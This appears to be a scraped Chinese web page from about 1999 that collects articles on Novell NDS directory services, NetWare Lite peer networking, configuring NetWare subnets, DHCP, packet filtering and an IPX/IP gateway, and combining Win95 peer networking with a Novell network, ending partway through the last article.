    ·命名尽量与组织的名称和特点保持一致，避免重复，这样会有利于用户快速浏览和查找特定的资源。提高应用和管理的效率。
    ·目录树可以充分利用NDS易于管理和扩展的特点，有利于适应企业的发展和变化。划分分区要以网络的实际运行和拓扑结构为依据，兼顾未来的发展。恰当的规划NDS可以使网络的流量达到最少。同时要在NDS中建立容错和时间同步。
    ·充分考虑用户使用资源的情况，尽可能地将其用户放在同一个树枝目录下，这种安排是访问更加容易，在设置访问权限时减少管理的工作量。
    ·尽可能设置用户组，这样只需分配一次访问权限，同时可以减少管理的工作量。
    结论：NDS目录树将网络中的用户和元件组织在目录旗下，为网络中的用户提供统一身份，使组织的行政管理可以通过网络来实现。

返回


透视Novell的NDS（需求篇）

《一键清理系统垃圾》

透视Novell的NDS（需求篇）

这种思想是网络思想的一个飞跃，它把OO（Objiect Oriented）的方法应用于网络中，对象化了网络上的用户和各种组件，并把它们置于一个倒置的“树”中。网络就需要这种面向对象的具有层次的数据集合。

    因特网的延伸，将地球上林林总总的网络结织成一张大网，网络的含义也逐渐突破地域和行政的界线。人们创造了网络，而网络也正在改变人们的生活。在前面的部分，我们介绍了身份和目录的概念，指出目录服务将会成为未来网络应用和管理的核心。

    目前，世界上的大多数网络没有统一的身份和目录服务。那么今天这些网络中究竟在发生什么事呢？

    场景一A：公司的新秘书小刘，一报到经理就交给她一封信，说是前任留下的交接信，经理请她务必在当天把未完成的报表做完。打开交接信，只有一句话：所有的资料、文档和报表都放在公司的服务器内。小刘找到了公司的网络管理员小王，说明了情况。小王便开始一边为她建立网络账号，一边不厌其烦地讲述公司网络的情况。
    “这个账号是登录服务器的，从服务器上可以下载相关的材料和软件工具。”
    “这个账号是进入公司的MIS系统的。”
    “这个账号是访问市场部的数据库的。市场信息要到市场部的服务器上取。”
    “这个账号是……”
    没等小王说完，小刘已感到有点晕了：“哎呀，公司才二十来个人，一个人就有这么多账号呀！”
    “你可千万要牢记呀，每一个都很重要，各有各的用处”，小王解释说。
    场景二A：“叮叮叮……”上课铃响了，同学们纷纷涌入网络中心的开放实验室。这次上机实验的内容是用C语言完成冒泡法排序。看到大家整齐地坐在自己的座位上，谢老师非常满意地点了点头。
    “老师，我计算机上的VC怎么不能用呀！”，一个同学举起了手，谢老师赶紧走过去，经检查发现，硬盘上少了一个DLL文件。一定是哪一个粗心的同学将这个文件误删了。“从其它计算机上拷贝一个试一试”，谢老师摇了摇头。
    “老师，老师，我的桌面上，怎么没有任务栏呢？”这个同学的问题还没有解决完，身后的一个同学嚷了起来。谢老师回头一看，原来是一个顽皮的同学把任务栏拖到了最小，墙纸也被换成了“猫捉老鼠”。“现在的学生怎么……”
    “老师，老师，快来帮帮我！”谢老师还没有回过神来，坐在最里面的一个女生突然大叫起来。平静的教室乱成了一锅粥。
    上课还不到十分钟，谢老师已在实验室里不停地转来转去，满头是汗。
    场景三A：张主任下午要去做一个报告。上午他来到办公室，打开电脑，正准备将讲稿再完善一下。却发现公司的应用程序服务器没有响应。打电话到网络室，才知道是服务器意外死机了。这一下可把张主任急坏了。“这下可怎么办呢？写不完讲稿，下午就没法做报告，小马，咱们不是有两个服务器吗，为什么一台出了故障，另一个不能帮帮忙呢？”张主任在电话中对网络管理员小马说。
    “张主任，这两台服务器的工作可是不同的。一台是用于文件和打印服务，另一台才是应用程序服务器。这叫分工明确。”
    张主任语塞了。
    场景四A：公司参加一个工程的投标，决定从各个科室抽出几名精干的同志组成一个小组做前期的准备工作。小组刚成立两天，小组的全体成员就拉着公司的网络管理员小赵，要他帮着解决以下实际问题。
    “我们都是各个科室的，相互交换文件太困难。”
    “小的文件，可以用E－mail，大文件就麻烦了。”
    “我在计划室，如果要把文件分发给各位，就要一个一个地放到每个科室的服务器上，然后，还要用电话通知大家去取。”
    大家七嘴八舌地议论开来了，小赵在一旁直摸后脑勺。
    我想各位对以上的场景应该是不陌生吧！这些故事随时随地发生在我们的身边，无论我们在意还是不在意，它们都在给我们的工作带来不便和麻烦。有时候，我们会思考，网络为何不能聪明一点，自动地去完成这些机械的重复劳动；有时候，我们会妥协，我们的要求是不是高了些，网络也许只能这样，于是，日复一日，网络还是网络，我们还是我们，麻烦还是麻烦。

    网络真的只能是这个模样吗？再来看看这边发生的事。

    场景一B：公司的新秘书小刘上班第一天接过了前任的交接信，网络管理员小王对她说，“我给你建了一个账号，你可以用它登录服务器上，然后就可以访问公司的MIS、市场部的数据库，上因特网，收电子邮件了。从现在起，你就是以前的张秘书了，祝你工作顺利。”说完小王诚恳地笑了笑。
    场景二B：“叮叮叮……”上课铃响了，同学们纷纷涌入网络中心的开放实验室。打开计算机，登录网络。半个小时过去了，实验室里很安静。谢老师在自己的座位上悠闲地听着“嗒嗒”的击键声，似乎都感到有一点寂寞。
    场景三B：“下午要作报告，我得快点。”张主任一边说，一边在自己的电脑上修改下午的讲稿。虽然单位的应用程序服务器突然出现故障正在进行检修。张主任还是和往常一样专心致志地编辑他的讲稿，仿佛什么也没有发生似的。
    场景四B：老李是公司新成立的投标小组的组长，这个新小组是从各个科室抽出几名精干的同志组成的。他们一边要负责原来科室的工作，一边还要兼管小组的任务。这时，老李正好要将一份文档分发给小组的成员。只见他将文件拖到对话框中一个目录的分支下，工作就完成了。老李满意地点了点头。
    不知道大家有没有想过问一问这是发生在公元哪一年的事。说出来大家一定会惊讶。这些都发生在公元一九九九年！也就是现在呀！我们的网络不是有许多问题吗？
    ●难道我们不需要那么多的账号就可以做许多事了？
    ●难道学生们的水平和素质都提高了？
    ●难道服务器在停机的时候也可以提供服务？
    ●难道计算机变智能了，帮助我们将文件分发给大家了？
    ……
    其实是网络变“聪明”了！这里的网络和前面的网络中最大的不同就在于有了身份和目录服务！
    网络中有了身份可以做什么？
    总的来说可以优化网络的管理，更好地提供应用服务。它使网络有序化，让网络适应我们社会中角色的变化、策略化管理、学习和工作。而不是让我们去适应网络，做网络的追随者！目录服务是向网络中注入身份的重要手段。它是将连接、身份、公众管理一体化的关键。用Novell公司的CEOSchmidt的一句话来评价目录服务最恰当不过，“目录之于网络恰如Windows之于桌面”。
    因特网发展将经历从连接、到身份、再到社会的三个浪潮。在网络的连接阶段，我们关心的是将网络连接起来，关心的是浏览器、访问速度。也许我们还没有想到连上网做什么？因特网发展的速度真快，不经意间我们已悄然步入发展的第二个时期，人们开始关注网络的应用，关注网络的安全，关注自己在网络上的行为和表现，人们在现实社会中的个性要通过网络来表达。身份在这时突现出极其重要的作用，网络中没有身份，也就意味着网络中没有角色之分。设想一下，在一个没有人口档案、没有身份证的国度会是怎样？法官如何去起诉犯人呢？没有身份，也就更谈不上网络经济、电子商务。目录服务从身份的角度管理网络上的人口，从组织的角度管理网络上的各种资源，在更高的层次上，目录服务用目录将光纤、电缆、交换机织结的网络连成一个逻辑的网络实体。它解决了多重身份的困扰，每个用户在网络上是可以唯一标示的。目录充分地定义了用户的角色，无论他走到哪里，网络中只有唯一的“他”，无论他上网做什么，运行怎样的应用，网络都可以与他关联起来，而他也能获得全球一致的配置。
    从管理的角度上讲，客户端－服务器网络架构的普及给旧网络的管理观念带来了冲击。在过去的主机时代，系统没有弹性，所有的计算机上的行为都可以通过一个主机来控管。管理显得相对容易。当发展到今天的网络C／S结构时代，系统变得开放、富有延展性。客户端日益复杂和多样化。网络连接又使其具有分布性。网络管理成为了网络发展的一个瓶颈。与此同时，世界经济也在向小型化、多样化的趋势演进。动态变化是其中的一个重要特点。组织结构的不断流动变化，使得网络及其组件也在分布、变化。网络如何适应经济发展也成为了网络管理的难题。现代网络的种种特征必然要求基于策略的、富有弹性的、适应动态变化的网络管理。目录服务本身也是建立在C／S结构上的应用。它对象化了网络上的各种组件，具有分布性、延展性，可复制，能容错。它统一网络中各种资源组件，为网络管理员提供集中的管理视图，能适应企业组织的动态变化，执行各种策略管理。
    从网络应用的角度上讲，网络建设最终是为了网络应用，对于商业运营而言，目录是巩固公司信息，拉动公司与用户关系的信息杠杆；它为E－Commerce建立良好的基础，把商业运营中的产、供、销连接起来；它简化了工作流程、降低了生产成本。对于企业管理而言，目录服务能建立与企业组织机构相同的目录结构，用户在企业网中的角色与其在企业中地位一致，它使得企业通过网络进行行政管理成为可能。对于用户而言，可以获得方便、快捷和安全的应用服务，简化上网过程和应用操作，甚至可以丰富网上经历。
    因特网的浪潮已经将我们推到了一个选择的关口。要么，保持现在的网络体系，延续生活中的一点一点的麻烦，等待瓶颈到来的一天。要么，给网络安个灵魂，让它一统“三军”，我们将会发现网络中的生活永远“阳光灿烂”。

返回


透视Novell的NDS（应用篇）

《一键清理系统垃圾》

透视Novell的NDS（应用篇）

在银行、证券、电信、交通、政府、能源等领域应用NDS的解决方案很多，他们共同的特点是网络用户的身份惟一、可扩展性好、容错能力强、管理结构清晰以及运行稳定。
    对目录服务我们已不再陌生，而且感觉也越来越好。NDS可以帮助我们管理账号、桌面、应用程序和硬件设备，实现网络资源的优化配置；可以顺利地扩展网络，克服单点故障，保证网络稳定持续的发展；可以严格控制访问，防御黑客，消除安全隐患，为因特网中的电子商务和应用计算提供安全保障。只有强有力的目录服务才能使我们把握世纪之交因特网浪潮带来的机会，在21世纪网络经济中占据有利的位置。前面各期讨论了目录服务及NDS的诸多特点和应用，这里将再给出两个案例以飨读者。
    通过建立一个基于目录服务的网络，网上学校的建立就显得轻松许多。
    因特网将教育纳入自己的领地，用网上学校等方式为千千万万的学子们圆“清华梦”、“北大梦”。
    图1为网上学校的简单示意图。用户首先到网上学校登录注册，成为其学生，然后可以在本地拨号或用其它方式接入因特网，通过访问网上学校的Web站点，下载课件、参考资料，参加网上教学讨论，按时递交作业，参加考试，完成学业，获得毕业证书。整个教学过程都是在因特网上进行，而不要求教师和学生在同一个地点、同一时间一起参加。E－Schools怎样才能让渴望求学的人真正过一回“读书瘾”，让普通百姓上一次“物美价廉”的学校呢？关键还在网络的建设上。

    图1 网上学校

    教学本身的对象是人，学生是整个教学活动的中心，而在网络上代表人的是身份。要让网络与教学成功结合，没有身份是不行的。第一，没有身份就不能因材施教。处在网上学校后台的老师不直接面对学生，那么他又能如何根据每个学生的特点安排教学呢？第二，教学活动无法进行。课堂讲学的好处在于能及时获得学生的反馈信息，掌握学生的第一手资料。根据这些信息能确定课表中，什么课选修的人多，什么学生下载什么材料，教学计划的实施需要对这些情况予以充分考虑；第三，建立虚拟班级的需要。将学生根据专业划分为不同的班级进行教学是目前教学的一个基本模式。班级内可以选出班长、学委，组织同学相互讨论和交流。如何把班级放到网络上呢？在目前的一些网上学校的方案中，还欠缺这样的机制；第四，用户账号问题。网上学校的特点在于方便灵活，不要求学生在固定地点上课。异地用户如何照常“上课”呢？网上学校也有多个，学生又如何实现跨校选课，学校之间又如何相互承认学分呢？第五，收费问题。现在的远程教学实行的是按年度收费，在实践中，人们提出按下载课件、通信流量来收费，这又如何满足呢？
    这些与身份相关的问题会加大网上学校与课堂教学的距离，使人们担心这种教育投资是否物有所值。虽然在没有目录服务的条件下，也可以解决上述问题，但方案很复杂。通过建立一个基于目录服务的网络，网上学校的建立就显得轻松许多。
    NDS将通过网络为人们建立“身临其境”的网络教学环境。通常学校的学生档案也采用数据库，而NDS的优势在于它是一个存储网络元件信息的数据仓库，以目录为基础驱动和管理网络机制。它给予“学校”的每位学生一个惟一的身份。用NDS建立的学生对象可以记录姓名、年龄、电话号码、电子邮件和工作单位等信息，然后将这些数据提供给教学应用程序、网页生成器。学生要上网，网络中的身份和与身份有关的信息放入NDS的目录树，不仅易于管理，安全性也能得到保障。这样的环境中需要目录服务和数据库各尽其责，共同担负着教学环节中的重要任务。目前，Oracle的产品Oracle 8已经能很好的与NDS整合。教师将对学生的教学指导变成数据存入数据库中，再由应用程序将这些信息提取出来，转化为电子邮件、网页或其它电子材料提供给学生。学生在网络上的活动，如下载材料、参加讨论组、选课等也能被数据库的应用程序记录下来，从而为教师获得教学的整体效果提供一个后台信息库。NDS为用户集中提供访问控制、单点登录、安全认证等与身份有关的服务，它屏蔽了系统各个层次间的差异，整合了网络中的组件。网上学校的各种应用无须分别建立自己的身份系统，有效地降低了开发成本，减少了开发时间。有了NDS之后，整个网络环境管理视图显得格外清晰，基于身份的管理以及结合目录的数据库应用，为网上学校的发展开辟了广阔的前景。基于目录服务的应用程序还可以对网络中的数据进行统计分析和结果综合，产生相关的图表和报告进一步帮助“学校”制定新的计划和为学员提供更好的服务。从这个意义上讲，NDS成为学生和“学校”的纽带。通过NDS的分区和复制技术，只要在上海的服务器上建立了北京地区目录数据库的复制，北京的学生出差到上海，仍然可以用自己的账号上学。这个认证过程都在上海进行，不需要为在京沪两地传递信息而等待。在北京与上海之间建立复制与同步，相当于建立了备份，以防止意外故障。各个网上学校可以通过信任关系相互共享NDS中的用户数据，从而允许学生跨校选课。由于NDS整合了网络中的用户、应用程序、网络设备，策略地分配资源，详细记录各个组件在网络上的状态，也就为实施根据用户、流量或课件的多种收费方式提供了可能。
    以目录服务NDS为核心建立企业网将大大降低网络的拥有成本，减少管理和维护费用，提高网络效率。
    借助网络来管理和经营企业将是现代企业在未来竞争中立于不败之地的重要因素。
    举例来说，C公司是一家利用NDS建立企业网的高科技公司，在国内共有五个分公司，分别在上海、广州、西安、成都和沈阳，设在北京的是公司的总部。总部建有一个非常完善的Intranet，连接内部九个部门的局域网。企业网络中有三台服务器提供应用程序、文件打印、电子邮件、防火墙、内部Web服务和因特网接入等多项服务。这些服务器全部采用Novell公司的NetWare操作系统，各个部门的局域网内还有NT服务器和NetWare服务器，在NT服务器上安装了NDS for NT 2．0，整个公司通过ISDN与因特网相连。
    在NDS中，完全按照企业的组织结构建立了员工账号系统。公司的行政管理人员可以通过浏览目录树来实施行政管理。人事部通知公司的网络管理员小王，老马要从开发部调到工程部了，小王只用鼠标将代表老马的图标从开发部拖到工程部就完成了。公司内部发布材料，收取报告，操作都十分容易。

    图2 C公司的Internet/Intranet方案图

    企业有很多应用，如电子邮件、信息管理系统、工程数据库等。但每个员工只需要在打开时用一个账号登录就可以访问所有应用程序和资源，而且被严格控制在权限的范围内。NDS将目录中保存的账号和安全信息自动提交给需要使用它的应用，避免了用户的重复操作，登录过程也只需要零点几秒。不同的员工访问公司的内部站点，看到的页面是不同的。比如工程部的小谢与财务部的小周都访问http://www.corpc.com/（内部域名），但小谢看到的是最近的工程进度计划和本周的安排，而小周看到的却是本季度的财务报告和开会同事。因为C公司采用一个基于NDS的Web发布应用程序，它能安全地分布和管理文件。当用户访问内部站点时，NDS提交了用户在目录中的身份信息，然后Web发布应用程序，根据这些数据把文件和相关信息以HTML的方式组织起来，再发送出去。
    网络管理员小王配置网络参数、分发软件、检测病毒等都不需要离开自己的座位，只要打开自己的笔记本用Admin登录到服务器上即可。实际上，公司在应用NDS的这些日子里，小王明显感到自己肩上的担子轻了许多。企业内部的几个服务器间以及与各分公司的服务器间建立了复制和同步，防止网络中的单点失败。各个公司的网络通过因特网与企业网建立了VPN，相互传递文件和关键数据都能得到严格保密。通过NDS还可以架起公司与合作伙伴间的桥梁。L公司在技术上一直与C公司保持着密切的合作，在业务上双方建立了信任关系，而NDS则将这种关系“电子化”了。两个公司在目录数据库间也建立了信任关系，L公司新添一个用户，他可以立即访问C公司授权的网络资源，而不需要通知C公司的管理员去建立一个新的用户账号，安全认证和访问控制由NDS自动进行。
    随着公司业务的发展，C公司正积极准备进军电子商务市场，着手开发NDS之上的电子商务应用，希望让目录的优势变成电子商务领域中更多的商业机会。
    随着因特网的发展，目录服务观念将更加深入人心。人们已经认识到目录服务的重要性，纷纷向目录靠拢。传统的非目录应用也能被整合到目录中来，因而以目录统一网络的大旗将高高举起。因特网中的搜索引擎、电子商务、电子邮件如能利用目录将可以完成更多的任务，大大提升服务的质量。身份、目录与因特网的服务观念融为一体，“应用目录，提供更好服务”会给因特网络打下最深的烙印。

返回


用NetWare Lite实现简易对等网

《一键清理系统垃圾》

用NetWare Lite实现简易对等网

    计算机日益普及，一般的单位都能拥有几台，把它们联成一个局域网是一个不错的主意，可以实现数据资源的共享。但是，如果使用Novell NetWare或Windows NT等服务器－工作站类软件来管理，对于机器数目较少的使用者，就显得不那么划算了。下面介绍两个工作站－工作站形式的对等网管理软件，硬件构成上不需要专用的服务器，网络上的每台计算机都可以作为服务器，同时也都是工作站。在实际使用中证实，只要网络上工作的计算机不超过10台，对网络性能基本上没有什么影响。
    Novell NetWarelite 1．0是基于DOS环境下的对等网络管理软件，只有几百K字节，安装以及操作界面完全类似于NetWare 3．12。
    执行安装盘上的INSTALL，在安装过程中选择网卡类型，如果手里有网卡的NetWare驱动盘，也可以选择＂从磁盘安装，再选择中断号及地址，以及本机是否作为服务器。一般将网上的所有机器都既作为服务器，又作为工作站，只作为工作站的机器内部资源不能与其它计算机共享。
    安装完成之后，NetWare Lite要改变Config．sys中的Last Drive和Buffers的数值，所以要重新启动计算机，然后进入NetWareKite的安装目录，运行STARTNET．BAT，即可启动NetWare Lite，你所设置的中断号和地址值，保存在NET．CFG文件中。如果安装过程中设置有错误，可以用文本编辑器打开并编辑它。
    启动NetWare Lite后，还需要进一步设置本机所要共享的资源，将网络上的所有计算机的软硬盘及光驱都设置为共享，分别分配为A－Z各个驱动器。可以在NET集成环境下配置，也可以使用命令行方式配置，建议最好把它们都加入到Startnet．bat中去，以便每次开机都可以自动实现资源共享。
    其它的功能还有打印设备的共享、修改登录口令、设置用户读写权限等，基本上都与NetWare相同，可以参考软件详细的帮助。

返回


用NetWare建立部子网

《一键清理系统垃圾》

用NetWare建立部子网

     随着Intranet/Internet等信息技术的发展，企业将采用TCP/IP协议升级、改造自己的网络系统。然而，全部更新网络设备需要数额巨大的投资，并且要在技术、管理方面对人员进行培训。因此，并不是每个企业都有可能完全进行这样的升级改造。网络系统的主干部分采用交换机、路由器等新型专用设备，部门级子网采用从原有系统升级的改造方案，更有利于保护原有投资，保证系统的平稳过渡，从而更适应大多数企业的需求。
    当前这些需要升级改造的企业内部网的子网，基本上是使用IPX协议的局域网系统。这样的网络一般主要由一个或几个NetWare服务器以及几十台PC机构成。Novell NetWare作为一种优秀的网络服务器操作系统，在升级到IntraNetWare4.11以来，已提供对Intranet的充分支持。在NetWare服务器上配置TCP/IP协议、将NetWare服务器配置为路由器等支持TCP/IP的网络，已在实践当中得到应用。本文介绍了使用NetWare服务器来构建内部子网过程中涉及到的一些问题。
    一、使用ARP代理构建子网及分支子网
    为了便于管理和维护，在规划网络的时候会将整个网络按物理位置或业务部门划分为多个子网。然而，设定子网除了需要对路由器进行相关的设置以外，还必须对网络中每台计算机的网络设置进行修改。在计算机较多和使用者对子网划分不太了解的情况下，网络配置的维护工作将十分繁重。使用ARP代理（Proxy ARP）可以使网络管理员修改子网及路由器的配置而不必改动每台计算机的网络设置。分支子网（Stub Subnetwork）可以在原有网络划分的基础上任意划出一个子网，而不影响网络的其它子网划分。使用这两种路由器的配置方法将会大大减轻网络管理员的配置及维护工作，并使整个网络更具灵活性。
    在TCP/IP协议中，ARP协议（Address Resolution Protocol）是用来查找一个IP地址所对应计算机物理地址的一个协议。通常，一台计算机需要和另一台计算机进行通讯时，它使用本机IP地址、目的计算机IP地址以及网络掩码来判断目的计算机是否在网络内部。如果在网络内部，它广播一个ARP请求，接受到请求的计算机将自己的物理地址返回给发送方，然后才能开始建立连接。路由器的ARP代理（Proxy ARP）功能是指路由器将代理实际子网外的计算机，用路由器的物理地址回应网络上的ARP请求。然后，利用路由功能将接收到的数据包转发到目的计算机上，代理ARP的目的是把子网给隐蔽起来。
    正常情况下，子网划分是非常严格的，不允许网络存在重叠和嵌套现象。然而，在使用ARP代理的情况下，分支子网可以存在。这样就大大减少了网络划分的复杂程度，增加了划分网络的灵活性。
    ARP代理作为NetWare操作系统支持高级路由能力的一项基本功能，在安装了NetWare服务器操作系统后即可配置使用。全部配置可以在服务器的控制台上通过NetWare的网络配置软件来完成。
    用户在配置网络的时候，不必了解具体的子网划分，只需按照未划分子网前的配置进行网络配置即可。因此，减轻了网络划分和配置维护造成的负担，增加了灵活性。

    二、使用DHCP服务器动态配置主机
    由于在TCP/IP协议中，网络上每台计算机都必须拥有一个IP地址，必须配置包括IP地址、网络掩码、缺省网关以及名字服务器等等信息。用户使用自己选取的IP地址配置计算机，就会很容易造成地址冲突。同时，网络掩码和缺省网关设置不正确会使计算机不能与子网外计算机正常通信。另外，如果计算机需要在属于不同网络的不同地点使用，网络配置就需要经常改换。因此，管理计算机网络设置，对于用户和网络管理员都是一个繁重的管理和维护工作。
    DHCP是动态主机配置协议（Dynamic Host Configuration Protocol），DHCP服务器能够在网络上进行IP地址及其它TCP/IP配置信息的分配和维护工作，每一次DHCP客户启动时便从DHCP服务器中请求IP地址以及其它配置信息，服务器将从它允许发放的IP地址数据库中挑选一个分配给DHCP客户机。如果客户机接受了这个地址，那么在客户机运行阶段，这个IP地址将归该计算机专有。使用这个协议，用户便不必了解配置网络的相关知识，同时网络管理员也减少了维护负担。更为重要的是，它提供了IP地址的集中管理手段，避免了地址冲突及其它配置错误，保证了网络的可用性。
    在IntraNetWare4.11版本中提供了DHCP服务器，可以使用NetWare的Install.nlm进行安装。
    1在服务器上装入IntraNetWare操作系统的第一张CD，在控制台上键入Load Install，并输入正确的路径即可进行安装。
    2使用Dhcpcfg.nlm进行配置。使用Insert键为每个要使用DHCP服务的网络界面进行设置。设置的信息包括DHCP服务的网络及掩码、帧类型、缺省路由器、DNS的有关设置、NetBios的有关设置、动态IP的范围以及NetWare/IP的有关设置。
    3装入DHCP服务器程序Dhcpsrvr.nlm，使用Load Dhcpsrvr并将该句放入Autoexec.ncf中，则IntraNetWare中的DHCP服务器将开始工作。
    对于客户计算机，只需简单激活DHCP客户程序即可。例如在Windows95中，在控制面板中的网络选项中选择或添加TCP/IP协议，并在IP地址选项中设为Obtain an IP address automatically，重新启动计算机则DHCP客户程序将自动为用户配置好网络。
    三、将NetWare服务器配置为包过滤型的防火墙
    由于TCP/IP是为公共网络系统Internet而设计的，且大部分基于TCP/IP的应用程序很少考虑到安全性的要求。又由于TCP/IP的开放性，网络上存在很多专门攻击使用TCP/IP协议的计算机程序，例如著名的Land和Teardrop攻击。因此，即使在企业内部，如何在网络互联的情况下保障信息安全，仍然是网络管理的一个重要任务。
    为了加强网络安全管理，需要在多个网络间提供访问控制。选择在运行NetWare的路由器上使用包过滤的高级特性，就能够将来自不受欢迎的节点的用户隔离在子网之外，并且不影响网络的正常工作。NetWare提供的包过滤的高级特性和路由功能完全集成在一起，它基于IP数据包源或目标地址或TCP端口来判断数据包是否合法，如合法则直接转发，否则就丢弃该包。这种方法对用户完全透明，速度快并具有较高的网络性能和较好的应用程序透明性，而且不需要任何额外的费用，只需配置NetWare服务器即可支持。
    将NetWare服务器配置为包过滤型的防火墙，首先要在NetWare服务器上配置好TCP/IP并将服务器配置为路由器。这些设置需通过NetWare网络设置程序Inetcfg.nlm来完成，而过滤规则则由过滤器配置程序Filtcfg.nlm来完成。
    1在控制台输入Load Inetcfg启动配置程序，将Filter Support选项设为“Enable”，退出Inetcfg并重新初始化网络。
    2输入Load Filtcfg载入过滤器配置程序，选择TCP/IP配置TCP/IP的过滤规则，选Packet Forwarding Filters，将Status选项设为“Enable”，然后通过“Action”、“Filters”、“Exceptions”选项的设置，即可定义源或目的报文地址、端口以及路由器转发数据包的网络界面的限定规则。其中对网络界面的设置对于防止IP spoofing（IP地址伪造）侵入非常重要。
    通过对包过滤的设置，NetWare服务器可以作为一种高效率的防火墙，在保障内部网络运行的同时，防止从未授权的外部节点访问被保护的内部网络，也能够控制内部网络访问收费或敏感节点。
    四、使用IPX/IP网关接入Internet
    企业内部网络在接入Internet的时候，将会遇到很多问题。第一个问题便是前面提到的网络安全问题，通过包过滤型防火墙的设置能够起到安全保障作用，但由于包过滤无法有效区分来自同一IP地址的不同用户，所以它的安全性不能在用户级进行控制；另一问题是当接入Internet时，企业只能得到有限的IP地址空间，而无法为其每一台计算机都申请到合法的IP地址。
    IntraNetWare中使用了IPX/IP网关来解决这些问题。在NetWare服务器上运行IPX/IP网关，网络内部的工作站使用IPX与服务器进行通讯，当工作站要访问IP网络时，由网关服务器将IPX协议转换为IP协议，使用网关服务器的IP地址与外部IP网络进行通讯。这样，外部网络和内部网络使用不同的协议，只通过网关进行通讯，而不存在直接的连接，对外部网络形成一道天然的防火墙。由于IPX/IP网关和Novell的NDS（Novell Directory Service）目录服务紧密集成在一起，网络管理员可以基于NDS对用户进行访问授权，完美地解决了包过滤型防火墙不能区分用户的问题。此外，由于内部工作站只需配置IPX，因此仅仅为网关服务器申请一个IP地址，就能满足全部工作站上网的要求。
    IPX/IP网关使多个工作站共享一个IP，使用IPX报头封装IP，发送到具体的工作站上。而工作站要保持各种TCP应用程序的兼容，必须使用特定的TCP支持堆栈。IntraNetWare在其Client32客户程序中提供了IPX/IP网关客户程序，它通过使用一个支持IPX的Winsock.dll来支持网络应用程序与网关服务器通讯。
    安装IPX/IP网关首先应该在NetWare服务器上使用Install.nlm安装网关服务器软件。
    1控制台键入Load Install，选择Product Options|Install a products not listed，键入CD的路径并在驱动器中装入IntraNetWare第四张CD，进行安装，并重新启动。
    2Load Inetcfg，选择Protocols|TCP/IP|IPX/IP Gateway Configuration将IPX/IP Gateway选项设为“Enable”。然后使用load servman修改系统参数，将Maximum acket Receive Buffers的值改为1000，Minimum PacketReceive Buffers改为400，重新启动系统。
    3管理员需要在管理工作站上修改Windows系统目录下的Nwadmin3x.ini文件，在[snapin Object DLLs WIN3X]下增加一行Ipxgw3X.DLL=Ipxgw3X.DLL。然后启动Nwadmin3x，就能发现NDS树中多了一个以－GW结尾的网关对象。为了使网关正常使用，管理员必须手工修改权限托管关系。
    ①使[Public]对象成为网关对象的托管者，对“Object rights”具有Browse权，对“all properties”具有Read和Compare权限。
    ②使[Public]对象成为服务器对象的托管者，对“Object rights”具有Browse权，对“network address property”具有Read和Compare权限。
    ③使网关对象成为[Root]对象的托管者，对“Objectrights”具有Browse权，对“all properties”具有Read和Compare权限。
    4安装IPX/IP网关后，NDS对象将增加两个属性，一个是“IPX/IP Gateway Service Restrictions”，管理员用它对用户可以使用的端口进行限制。另一个是“IPX/IP Gateway Host Restrictions”，管理员使用它对用户连接的计算机及网络进行限制。
    服务器端安装完毕之后，需要对客户端进行安装。服务器安装过程中已将相应客户软件安装在sys:public\client\win95中（Windows 3.1客户软件在相应目录中），在该目录中用setup安装client32软件。然后使用Windows 95控制面板上的网络选项配置IPX/IP网关，需要增加一个Novell NetWare IPX/IP Gateway的协议，重新启动系统，即可使用IPX/IP网关。
    通过合理配置NetWare服务器，使用IntraNetWare提供的各种功能，企业可以将原有基于IPX的网络改造为基于TCP/IP的Intranet。NetWare服务器提供了路由能力、IP地址分配与复用能力、基于包过滤和网关的防火墙能力，为Intranet的升级改造，提供了一个合适的方案。

返回


在NOVELL网络中实现Win 95对等网络服务功能

《一键清理系统垃圾》

在NOVELL网络中实现Win 95对等网络服务功能

一、两种不同服务类型网络
    我们知道，Novell网络是一种专用网络（Dedicated）。它属于Clients／Server（s）体系结构。这种网络至少有一台专用服务器，一般有文件服务器，对文件服务器不能把它做一般的计算机使用，服务器计算机的主要任务是提供对磁盘、CD—ROM、打印机、文件数据等的集中统一管理，方便各上网站点对外设和数据的共享。Novell网络在我国使用面十分广泛，许多单位以前使用或正在使用这种集中式的网络。
    与Novell网络这种专用网络相反，另外一种网络叫对等网络（即Peer－to－Peer）。在对等网络上，各站点既是网络服务提供者———服务器，又是网络服务申请者———工作站。故名对等服务（即Peer－service）。Windows95实际上就是一种对等网络操作系统，不过由于许多用户常把它当作PC机操作系统使用而不太注意Windows95内含的网络服务功能。其实Windows95网络实现网络服务功能不使用专用服务器，凡在网上的任何Windows95站点都可看成一台非专用服务器。这与Client／Server体系结构完全不同，它具有许多优点：
    （1）各工作站之间共享外设。如一台Windows95站可以象使用自己的驱动器一样使用另外一个Windows95站点的软驱，或共享CD－ROM。
    （2）更易实现共享网络数据。一个站点的用户可以直接访问另一站点硬盘的数据或程序，只要分配给用户适当的权限。
    （3）共享外设如：打印机、调制解调器等更加容易。任何Windows95站点只要有权限，它就可以使用连结任何Windows95站点上的打印机，或同时使用若干个Windows95站点上的打印机打印。当然此打印机应设置成共享。不过，对等网络也有它的缺点，表现在：
    （1）资源分散，不便统一管理。
    （2）网络安全机制有限。
    所以对等网络适用站点不多，网络规模较小的机构。
    笔者根据实际使用经验，在Novell网络基础上加上对等网络服务功能。结合两种网络的优点，增强原来单一网络的接口能力，使用户更加容易地使用网络资源。形成一种混合型网络，即Novell集中网络＋Windows95对等网。
     二、混合网组建
    1．组建方案
    本单位是个较大的实体，单位计算中心要承担两方面的任务：一是构建整个单位网络建设、信息处理及单位各处室计算机的维护管理工作；二是计算中心自己的信息设施建设，构建中心的网络，形成中心自己的软硬件开发平台。
    单位现有机器情况：一台COMPAQPRO120的专用服务器，单位二十几个处室共30台不同档次PC机构成工作站和计算中心内10台P5系列高档微机可以组成中心工作站。
    由于单位各处室入网要求严格，安全要求高，而且数据、设备共享通常在若干相关处室之间，电子邮件等电子通信也有严格权限划分，为管理这些处室上网机器宜采用集中统一网络，这样便于安全、高效管理、所以首先组建以COMPAQPRO120为专用文件服务器的Novell50用户网络。对计算中心10台微机，考虑到特殊使用要求：主要用来搞软、硬件开发，承担整个单位网络管理工作，以及各站点间经常交换程序和数据；特殊的使用人员：中心使用人员水平都较高，对网络资源使用较熟练、规范。特殊的费用指标：不增加一点点硬件投资。以上这些再结合中心10台微机都是P5系列微机的有利条件，我们决定把计算中心10台微机全装上Windows95操作系统，利用已有Novell网络，让中心10台机器上Novell网，并且运用Windows95内置网络功能实现中心内部对等网络服务功能，既达到中心内部资源共享的目的，又可以管理和使用Novell网络资源。
    2．方案实施
